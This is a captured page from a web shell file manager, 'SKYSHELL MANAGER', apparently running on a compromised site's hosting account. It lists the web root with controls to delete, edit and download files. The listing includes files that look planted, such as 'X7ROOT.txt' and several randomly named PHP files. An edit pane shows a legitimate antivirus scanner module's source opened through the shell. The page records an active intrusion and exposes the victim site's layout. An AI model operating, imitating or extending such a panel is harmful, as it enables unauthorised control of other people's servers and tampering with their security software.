📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: scanner.py
""" This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <https://www.gnu.org/licenses/>. Copyright © 2019 Cloud Linux Software Inc. This software is also available under ImunifyAV commercial license, see <https://www.imunify360.com/legal/eula> """ import os from collections import defaultdict from logging import getLogger from defence360agent.contracts.config import Malware as Config from defence360agent.contracts.messages import MessageType from defence360agent.contracts.plugins import ( MessageSink, MessageSource, expect, ) from imav.malwarelib.config import MalwareScanType from imav.malwarelib.model import MalwareIgnorePath from imav.malwarelib.plugins.detached_scan import DetachedScanPlugin from imav.malwarelib.scan.scanner import MalwareScanner from defence360agent.utils import recurring_check logger = getLogger(__name__) class Scanner(MessageSink, MessageSource): _loop, _sink = None, None _targets = None _scan_task = None async def create_source(self, loop, sink): self._loop = loop self._sink = sink self._scan_task = self._loop.create_task(self._recurring_scan()) async def create_sink(self, loop): self._targets = defaultdict(set) async def shutdown(self): self._scan_task.cancel() await self._scan_task def _process_scan_task(self, message): for path in message["filelist"]: if not isinstance(path, str): t = type(path) path = os.fsdecode(path) logger.error( "Received path %s as %s instead of %s. Message: %s", path, t, type(str), message, ) scan_type = message.get("scan_type", MalwareScanType.REALTIME) self._targets[scan_type].add(path) @expect(MessageType.MalwareScanTask) async def process_scan_task(self, message): self._process_scan_task(message) @expect(MessageType.MalwareRescanFiles) async def rescan_files(self, message): filelist = message["files"] msg = MessageType.MalwareScanTask( filelist=filelist, scan_type=message.get("type", "rescan") ) self._process_scan_task(msg) @staticmethod async def _filter_out(targets): result = list() for filename in targets: if os.path.exists( filename ) and not await MalwareIgnorePath.is_path_ignored(filename): result.append(filename) return result async def _scan_targets(self, targets, scan_type): if targets: logger.info( "Checking files to scan with type={}".format(scan_type) ) file_list = await self._filter_out(targets) if not file_list: return logger.debug("Scanning files: %s", file_list) scanner = MalwareScanner(sink=self._sink, hooks=True) scanner.start(file_list, scan_type=scan_type) result = await scanner.async_wait() if scanner is not None: message = await DetachedScanPlugin.aggregate_result(result) await self._sink.process_message( MessageType.MalwareScan(**message) ) async def _scan(self): # copy set to list to prevent race conditions targets, self._targets = self._targets, defaultdict(set) for scan_type, files in targets.items(): await self._scan_targets(files, scan_type) @recurring_check(Config.INOTIFY_SCAN_PERIOD) async def _recurring_scan(self): await self._scan()
Save